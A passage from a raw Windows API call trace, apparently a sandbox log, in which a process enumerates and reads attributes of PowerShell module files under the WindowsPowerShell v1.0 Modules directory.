lpOldMode=0x5a0e384) returned 1 [0157.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25cdf78 | out: lpFileInformation=0x25cdf78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6)) returned 1 [0157.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0157.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0157.825] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.825] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.826] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a3e9e0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90a3e9e0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x5eaf6a81, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0157.826] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a3e9e0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90a3e9e0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x5eaf6a81, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0157.826] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0157.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0157.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0157.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0157.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25ce61c | out: lpFileInformation=0x25ce61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a3e9e0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90a3e9e0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x5eaf6a81, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0157.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0157.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0157.828] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.828] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.828] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91991780, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91991780, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x208, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0157.828] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911aeea0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911aeea0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0157.828] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911aeea0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911aeea0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0157.828] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0157.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0157.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0157.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0157.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.829] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25ceaf0 | out: lpFileInformation=0x25ceaf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91991780, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91991780, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x208)) returned 1 [0157.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0157.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0157.830] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.830] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.830] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.830] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1a8e27, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0157.830] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d783500, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d783500, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1de9cd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x19bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0157.830] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d783500, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d783500, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1de9cd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x19bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0157.830] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0157.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0157.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0157.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0157.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25cf368 | out: lpFileInformation=0x25cf368*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1a8e27, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1c8)) returned 1 [0157.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0157.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.832] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.832] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0157.832] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0157.832] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7a [0157.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x7a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0157.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7a [0157.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x7a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0157.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.833] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25cfb40 | out: lpFileInformation=0x25cfb40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x288)) returned 1 [0157.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0157.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0157.833] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.834] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, 